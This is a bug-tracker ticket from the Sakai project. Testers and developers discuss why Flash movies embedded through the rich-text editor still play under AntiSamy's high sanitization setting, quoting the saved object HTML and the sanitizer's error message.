Flash movies play on High level AntiSamy
Description
is related to
relates to
Activity
Neal Caidin May 1, 2013 at 11:40 AM
1) Does the comment from mean that Flash movies are expected to work? Or in certain circumstances?
2) I don't know about the local browser plug-in issue. I just tested on IE 9 on Windows 7 and I get the same results as Firefox/Mac
<p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie451866" type="application/x-shockwave-flash" width="320"><param name="movie" value="http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv" /><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&showplayer=always&width=320&height=240&showiconplay=true&autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>
<p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie451866" type="application/x-shockwave-flash" width="320"><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&showplayer=always&width=320&height=240&showiconplay=true&autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>
Sam Ottenhoff May 1, 2013 at 11:39 AM
> Sam: My understanding was that it was a safe SWF file that would only load up user-supplied media. I don't
> see how that SWF would be exploited unless it (wrongly) loads up any old SWF
This is correct. The StrobeMediaPlayback SWF file is trusted and is responsible for loading untrusted end-user media (mp4, flv, etc) from any location.
Aaron Zeckoski May 1, 2013 at 11:33 AM
NOTE: I think the movie attribute is being somehow inserted by the browser itself... I don't see this in my testing though. Perhaps this is caused by a local browser plugin?
Aaron Zeckoski May 1, 2013 at 11:30 AM
OK, I realize what this is referring to now.
From
AZ: /library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf allows anything to be embedded
Sam: My understanding was that it was a safe SWF file that would only load up user-supplied media. I don't see how that SWF would be exploited unless it (wrongly) loads up any old SWF
The agreement was that when you are embedding using the video link in the editor (which always uses the technique I mentioned) that you are accepting that risk and trusting the StrobeMediaPlayback library. Users who are uncomfortable with that would need to customize the antisamy rules to block it AND disable the ckeditor movie button.
This matches legacy behavior.
Neal Caidin May 1, 2013 at 11:16 AM
After saving (clicking Post Announcement again) the html source is : <p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie987947" type="application/x-shockwave-flash" width="320"><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&showplayer=always&width=320&height=240&showiconplay=true&autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>
and the movie plays fine.
Details
Priority
MajorAffects versions
Components
Assignee
Aaron ZeckoskiAaron Zeckoski(Deactivated)Reporter
Neal CaidinNeal Caidin
Details
Details
Priority
MajorAffects versions
Components
Assignee
Aaron ZeckoskiReporter
Neal Caidin
I think the intent is that Flash movies should not play when AntiSamy is on its high setting.
I tried this across the following browser: Windows 7 / IE 9, Mac OS X / Firefox, Chrome and Safari on http://qa1-nl.sakaiproject.org/portal
With all but Chrome, I get the following error, but then save anyway and the movie is embedded and plays : Alert: The embed tag contained an attribute that we could not process. The movie attribute had a value of "http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv". This value could not be accepted for security reasons. We have chosen to remove the entire embed tag in order to continue processing the input.
With Chrome, no error, it just inserts and plays.